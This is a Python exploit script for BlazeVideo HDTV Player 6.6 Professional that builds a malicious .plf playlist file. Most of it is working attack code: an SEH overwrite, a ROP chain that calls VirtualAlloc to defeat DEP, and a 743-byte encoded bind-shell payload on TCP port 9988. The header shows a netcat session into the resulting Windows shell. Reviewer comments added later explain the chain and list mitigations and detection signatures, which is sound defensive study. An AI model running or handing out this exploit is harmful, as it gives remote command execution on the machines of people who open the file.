#!/usr/bin/python -w
#-----------------------------------------------------------------------------------#
# Exploit: BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR                     #
# Author: b33f - http://www.fuzzysecurity.com/                                      #
# OS: Tested on Windows 7 32-bit PRO SP1                                            #
# Software Link: http://www.blazevideo.com/download.htm                             #
# Pro v6.6 - Apr 12, 2011                                                           #
#-----------------------------------------------------------------------------------#
# The opportunity to secure ourselves against defeat lies in our own hands          #
# but the opportunity of defeating the enemy is provided by the enemy himself.      #
# - Sun Tzu                                                                         #
#-----------------------------------------------------------------------------------#
# Special thanks:                                                                   #
# Lincoln - Thx for the assist!                                                     #
# corelanc0d3r - Thx for taking the time to go over my work and pointing me         #
# at VirtualAlloc()!                                                                #
#-----------------------------------------------------------------------------------#
# root@bt:~# nc -nv 192.168.111.129 9988                                            #
# (UNKNOWN) [192.168.111.129] 9988 (?) open                                         #
# Microsoft Windows [Version 6.1.7601]                                              #
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.                    #
#                                                                                   #
# C:\Program Files\BlazeVideo\BlazeVideo HDTV Player 6.6 Professional>              #
#-----------------------------------------------------------------------------------#
#
# Reviewer summary (defensive reading of the chain documented in the gadget
# comments below):
#   * A malformed .plf playlist is written to disk. The file is 5000 bytes:
#     872 filler bytes, then the SEH overwrite, the ROP chain, a NOP sled and
#     the encoded payload, then 'B' padding up to 4128 bytes.
#   * The overwritten SEH handler is a stack-pivot gadget (ADD ESP,800 # RETN),
#     so control lands inside the attacker-controlled buffer.
#   * The ROP chain saves ESP, then fills in a VirtualAlloc() frame from that
#     saved pointer: lpAddress = saved ESP + 0x1E0, dwSize = 1,
#     flAllocationType = 0x1000 (MEM_COMMIT), flProtect = 0x40
#     (PAGE_EXECUTE_READWRITE). Re-protecting the buffer as RWX is how DEP is
#     sidestepped; the sled + shellcode then run from the stack.
#   * Every gadget address is a fixed 32-bit address (0x60.., 0x61.., 0x64..
#     ranges), i.e. the chain relies on the modules it is built from loading at
#     the same base every time. The page does not name those modules.
#     Mitigation: building them with /DYNAMICBASE and /SAFESEH, or enabling
#     SEHOP on the host, would break the pivot and the chain; a parser bounds
#     check on the playlist entry removes the overflow itself.
#
# NOTE(review): the script assumes Python 2 string semantics — each "\xNN"
# literal is a byte string and is written through a text-mode handle. Under
# Python 3 the same literals are str, and the text-mode write would encode
# every value >= 0x80 differently — TODO confirm before drawing any conclusion
# from a file produced by a different interpreter.
# NOTE(review): `-w` in the shebang is not a CPython command-line option
# (`-W` is); presumably a typo that only matters when run via the shebang.

filename="blaze.plf"   # output playlist; the vulnerable parser reads this file

#-----------------------------Pivot-Align-----------------------------#
# SEH handler address: a stack-pivot gadget. After the pivot ESP points
# into our buffer, and `pad` (35 * 4 = 140 bytes) aligns it to `stack`.
SEH = "\x95\x53\x30\x61"         # Pivot; ADD ESP,800 # RETN
pad = "b33f"*35                  # pad ESP to our alignment (140-bytes)

#------------------Save Stack Pointer in EDI&EAX&ESI------------------#
# Copies the post-pivot ESP into EDI, EAX and ESI; the later sections use
# EAX as the lpAddress base and ESI as the write cursor into `params`.
stack = (
"\xC5\x30\x03\x64"      # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x24\x60\x02\x64"      # PUSH ESP # POP ESI # RETN
"\xEE\x65\x03\x64"      # XCHG EAX,ESI # RETN
"\x24\x60\x02\x64"      # PUSH ESP # POP ESI # RETN
"\xBF\xCD\x02\x64")     # ADD ESP,20 # RETN

#----------------------------VirtualAlloc()---------------------------#
# Skeleton VirtualAlloc() call frame. The "WWWW"/"XXXX"/"YYYY"/"ZZZZ"
# placeholders are overwritten in place by the ROP chain below; the first
# dword is a pointer that the "Fix PTR" section dereferences (twice), so it is
# presumably an import-table slot rather than the function body — verify.
params = (
"\xB4\x11\x34\x60"      # VirtualAlloc()
"WWWW"                  # lpAddress \ We need this value twice for alignment!
"WWWW"                  # lpAddress /
"XXXX"                  # dwSize (0x1)
"YYYY"                  # flAllocationType (0x1000)
"ZZZZ"                  # flProtect (0x40)
"\x41\x41\x41\x41"      # Padding
"\x41\x41\x41\x41")     # Padding

#-----------------------ROP Chain - lpAddress-------------------------#
# 15 x (ADD EAX,20) = EAX + 0x1E0: the saved ESP plus the distance to the
# region that will be re-protected. 8 x (DEC ESI) moves the cursor so that
# ESI+10 / ESI+14 are the two lpAddress slots, which are then stored.
rop = (
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN \
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN | ADD EAX 1E0
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN |
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN /
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN \
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | DEC ESI 8
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | We need lpAddress twice to return to the proper
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | place after executing VirtualAlloc(), the lpAddress
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | parameters are located at ESI+10 and ESI+14
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN |
"\xCB\x06\x11\x64"      # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN /
"\xCA\xB5\x33\x60"      # MOV DWORD PTR DS:[ESI+10],EAX # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x41\x41\x41\x41"      # Padding for POP EBX
#------------------------ROP Chain - dwSize---------------------------#
# Each parameter section follows the same shape: reload ESI from EAX, zero
# EAX, build the value in EAX, advance ESI by 4 (4 x INC ESI) and store it at
# [ESI+14]. Here the value is 1 (XOR EAX,EAX ; INC EAX).
"\xD3\xB1\x04\x64"      # PUSH EAX # POP ESI # RETN 04
"\xCA\x71\x04\x64"      # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"\x41\x41\x41\x41"      # Padding for RETN 04
"\x6D\xA1\x03\x64"      # INC EAX # RETN
"\x41\x41\x41\x41"      # Padding for RETN 04
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x90\x73\x64\x61"      # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x41\x41\x41\x41"      # Padding for POP EBX
#-------------------ROP Chain - flAllocationType----------------------#
# Value 0x1000 (MEM_COMMIT) built without NUL bytes: POP 0xFFFFEFFF, NEG -> 0x1001,
# DEC -> 0x1000.
"\xD3\xB1\x04\x64"      # PUSH EAX # POP ESI # RETN 04
"\xCA\x71\x04\x64"      # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"\x41\x41\x41\x41"      # Padding for RETN 04
"\x13\x30\x10\x64"      # POP EAX # RETN
"\x41\x41\x41\x41"      # Padding for RETN 04
"\xFF\xEF\xFF\xFF"      # 0xFFFFEFFF
"\xCB\x6E\x33\x61"      # NEG EAX # RETN
"\x2C\x4E\x10\x64"      # DEC EAX # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x90\x73\x64\x61"      # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x41\x41\x41\x41"      # Padding for POP EBX
#-----------------------ROP Chain - flProtect-------------------------#
# Value 0x40 (PAGE_EXECUTE_READWRITE): 2 x (ADD EAX,20) on a zeroed EAX.
"\xD3\xB1\x04\x64"      # PUSH EAX # POP ESI # RETN 04
"\xCA\x71\x04\x64"      # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04
"\x41\x41\x41\x41"      # Padding for RETN 04
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN
"\x41\x41\x41\x41"      # Padding for RETN 04
"\xF7\x24\x03\x64"      # ADD EAX,20 # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x15\x14\x03\x64"      # INC ESI # RETN
"\x90\x73\x64\x61"      # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x41\x41\x41\x41"      # Padding for POP EBX
#-----------------ROP Chain - Fix PTR VirtualAlloc()------------------#
# Replaces the first dword of `params` with the value found two pointer hops
# away from it, then restores the saved ESP from EDI, adds 4 and pivots ESP
# onto the completed frame (PUSH EAX # POP ESP # RETN) so the call executes.
"\xD3\xB1\x04\x64"      # PUSH EAX # POP ESI # RETN 04
"\x0B\xA8\x03\x64"      # MOV EAX,DWORD PTR DS:[EAX] # RETN
"\x41\x41\x41\x41"      # Padding for RETN 04
"\x0B\xA8\x03\x64"      # MOV EAX,DWORD PTR DS:[EAX] # RETN
"\x64\x40\x04\x64"      # MOV DWORD PTR DS:[ESI],EAX # POP ESI # RETN
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x16\xA4\x04\x64"      # MOV EAX,EDI # POP EDI # POP ESI # RETN
"\x41\x41\x41\x41"      # Padding for POP EDI
"\x41\x41\x41\x41"      # Padding for POP ESI
"\x6D\xA1\x03\x64"      # INC EAX # RETN
"\x6D\xA1\x03\x64"      # INC EAX # RETN
"\x6D\xA1\x03\x64"      # INC EAX # RETN
"\x6D\xA1\x03\x64"      # INC EAX # RETN
"\xC6\x2A\x03\x64")     # PUSH EAX # POP ESP # RETN

#-------------------------------------------------------------------------------------#
# We have an ample amount of space...                                                 #
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c    #
# [*] x86/alpha_mixed succeeded with size 743 (iteration=1)                           #
#-------------------------------------------------------------------------------------#
# Opaque encoded payload (743 bytes, 49 x 15 + 8); per the command above it is a
# bind shell listening on TCP 9988, which is what the header's nc transcript
# connects to. Alphanumeric encoding keeps it free of bytes the parser would
# mangle and makes it look like plain text to a naive inspection.
shellcode = (
"\x89\xe5\xda\xd8\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39"
"\x6c\x79\x78\x6b\x39\x63\x30\x57\x70\x55\x50\x31\x70\x6b\x39"
"\x39\x75\x30\x31\x78\x52\x45\x34\x6e\x6b\x70\x52\x36\x50\x6e"
"\x6b\x32\x72\x34\x4c\x4c\x4b\x50\x52\x77\x64\x4c\x4b\x50\x72"
"\x74\x68\x54\x4f\x68\x37\x31\x5a\x51\x36\x65\x61\x6b\x4f\x74"
"\x71\x59\x50\x6e\x4c\x75\x6c\x75\x31\x53\x4c\x63\x32\x54\x6c"
"\x31\x30\x4f\x31\x38\x4f\x44\x4d\x56\x61\x78\x47\x6b\x52\x78"
"\x70\x76\x32\x73\x67\x4e\x6b\x43\x62\x52\x30\x4e\x6b\x70\x42"
"\x37\x4c\x43\x31\x4a\x70\x4e\x6b\x67\x30\x42\x58\x6d\x55\x6f"
"\x30\x31\x64\x62\x6a\x37\x71\x7a\x70\x62\x70\x4e\x6b\x42\x68"
"\x72\x38\x6e\x6b\x32\x78\x75\x70\x67\x71\x4b\x63\x6d\x33\x45"
"\x6c\x73\x79\x4c\x4b\x57\x44\x6e\x6b\x43\x31\x5a\x76\x66\x51"
"\x4b\x4f\x65\x61\x79\x50\x6e\x4c\x6f\x31\x38\x4f\x44\x4d\x36"
"\x61\x48\x47\x47\x48\x6d\x30\x53\x45\x6c\x34\x56\x63\x51\x6d"
"\x58\x78\x55\x6b\x63\x4d\x55\x74\x61\x65\x6a\x42\x36\x38\x4c"
"\x4b\x36\x38\x77\x54\x36\x61\x38\x53\x31\x76\x4e\x6b\x34\x4c"
"\x72\x6b\x4c\x4b\x53\x68\x67\x6c\x77\x71\x39\x43\x4e\x6b\x66"
"\x64\x4c\x4b\x43\x31\x48\x50\x4c\x49\x53\x74\x35\x74\x35\x74"
"\x43\x6b\x33\x6b\x30\x61\x73\x69\x71\x4a\x62\x71\x49\x6f\x6d"
"\x30\x50\x58\x31\x4f\x61\x4a\x4e\x6b\x42\x32\x38\x6b\x6d\x56"
"\x43\x6d\x33\x58\x75\x63\x74\x72\x57\x70\x35\x50\x50\x68\x42"
"\x57\x51\x63\x70\x32\x43\x6f\x73\x64\x33\x58\x32\x6c\x51\x67"
"\x56\x46\x76\x67\x6b\x4f\x4b\x65\x6f\x48\x6c\x50\x63\x31\x63"
"\x30\x73\x30\x37\x59\x78\x44\x72\x74\x32\x70\x55\x38\x64\x69"
"\x6d\x50\x50\x6b\x43\x30\x69\x6f\x4e\x35\x72\x70\x72\x70\x56"
"\x30\x42\x70\x63\x70\x50\x50\x61\x50\x62\x70\x30\x68\x79\x7a"
"\x76\x6f\x4b\x6f\x6d\x30\x59\x6f\x79\x45\x4e\x69\x79\x57\x44"
"\x71\x39\x4b\x56\x33\x65\x38\x76\x62\x35\x50\x57\x57\x76\x64"
"\x6d\x59\x6b\x56\x51\x7a\x62\x30\x33\x66\x56\x37\x65\x38\x59"
"\x52\x49\x4b\x77\x47\x55\x37\x59\x6f\x59\x45\x46\x33\x51\x47"
"\x45\x38\x6c\x77\x39\x79\x65\x68\x39\x6f\x59\x6f\x6b\x65\x46"
"\x33\x56\x33\x73\x67\x72\x48\x74\x34\x7a\x4c\x37\x4b\x59\x71"
"\x6b\x4f\x68\x55\x61\x47\x6f\x79\x78\x47\x43\x58\x50\x75\x62"
"\x4e\x70\x4d\x53\x51\x49\x6f\x7a\x75\x35\x38\x32\x43\x30\x6d"
"\x42\x44\x75\x50\x6c\x49\x48\x63\x72\x77\x46\x37\x33\x67\x56"
"\x51\x69\x66\x42\x4a\x57\x62\x50\x59\x70\x56\x59\x72\x69\x6d"
"\x43\x56\x4b\x77\x77\x34\x75\x74\x77\x4c\x77\x71\x56\x61\x4c"
"\x4d\x37\x34\x31\x34\x44\x50\x58\x46\x37\x70\x51\x54\x31\x44"
"\x52\x70\x42\x76\x46\x36\x51\x46\x67\x36\x43\x66\x50\x4e\x43"
"\x66\x42\x76\x43\x63\x71\x46\x45\x38\x53\x49\x48\x4c\x37\x4f"
"\x4b\x36\x59\x6f\x58\x55\x4b\x39\x6b\x50\x62\x6e\x56\x36\x61"
"\x56\x4b\x4f\x30\x30\x31\x78\x77\x78\x4e\x67\x47\x6d\x33\x50"
"\x49\x6f\x6b\x65\x4d\x6b\x48\x70\x6d\x65\x4e\x42\x32\x76\x65"
"\x38\x59\x36\x4f\x65\x6f\x4d\x4d\x4d\x49\x6f\x78\x55\x47\x4c"
"\x33\x36\x71\x6c\x57\x7a\x4b\x30\x39\x6b\x6b\x50\x53\x45\x64"
"\x45\x4f\x4b\x53\x77\x75\x43\x44\x32\x50\x6f\x32\x4a\x43\x30"
"\x50\x53\x49\x6f\x48\x55\x41\x41")

# Layout of the final file, in order:
#   872 x 'A'  -> filler up to the SEH record
#   SEH        -> pivot gadget address
#   pad        -> 140 bytes of alignment
#   stack/params/rop -> ROP chain and VirtualAlloc() frame
#   ph33r      -> 160-byte NOP sled + 743-byte payload
#   'B' x (4128 - len(b00m)) -> tail padding; total file size is 5000 bytes
# The fixed 872-byte offset and the 5000-byte total are the cheapest static
# signatures for a detection rule on .plf files.
ph33r = "\x90"*160 + shellcode
b00m = SEH + pad + stack + params + rop + ph33r
buffer = "A"*872 + b00m + "B"*(4128-len(b00m))   # name shadows the Python 2 builtin `buffer`; harmless here

# Text-mode write (fine on Linux under Python 2, where str is bytes); the handle
# is closed explicitly rather than via `with`.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()